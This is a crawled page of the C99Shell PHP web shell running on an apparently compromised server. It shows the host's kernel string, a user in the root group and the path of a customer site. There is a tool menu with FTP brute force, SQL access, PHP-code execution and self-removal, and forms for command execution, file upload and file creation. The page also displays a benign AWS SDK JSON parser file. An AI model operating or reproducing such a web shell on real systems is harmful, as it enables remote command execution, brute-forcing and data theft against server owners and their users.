!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/aws/aws-sdk-php/src/Api/Parser/   drwxr-xr-x
Free 28.7 GB of 117.98 GB (24.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     JsonParser.php (2.01 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace Aws\Api\Parser;

use 
Aws\Api\DateTimeResult;
use 
Aws\Api\Shape;

/**
 * @internal Implements standard JSON parsing.
 */
class JsonParser
{
    public function 
parse(Shape $shape$value)
    {
        if (
$value === null) {
            return 
$value;
        }

        switch (
$shape['type']) {
            case 
'structure':
                if (isset(
$shape['document']) && $shape['document']) {
                    return 
$value;
                }
                
$target = [];
                foreach (
$shape->getMembers() as $name => $member) {
                    
$locationName $member['locationName'] ?: $name;
                    if (isset(
$value[$locationName])) {
                        
$target[$name] = $this->parse($member$value[$locationName]);
                    }
                }
                if (isset(
$shape['union'])
                    && 
$shape['union']
                    && 
is_array($value)
                    && empty(
$target)
                ) {
                    foreach (
$value as $key => $val) {
                        
$target['Unknown'][$key] = $val;
                    }
                }
                return 
$target;

            case 
'list':
                
$member $shape->getMember();
                
$target = [];
                foreach (
$value as $v) {
                    
$target[] = $this->parse($member$v);
                }
                return 
$target;

            case 
'map':
                
$values $shape->getValue();
                
$target = [];
                foreach (
$value as $k => $v) {
                    
$target[$k] = $this->parse($values$v);
                }
                return 
$target;

            case 
'timestamp':
                return 
DateTimeResult::fromTimestamp(
                    
$value,
                    !empty(
$shape['timestampFormat']) ? $shape['timestampFormat'] : null
                
);

            case 
'blob':
                return 
base64_decode($value);

            default:
                return 
$value;
        }
    }
}


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0084 ]--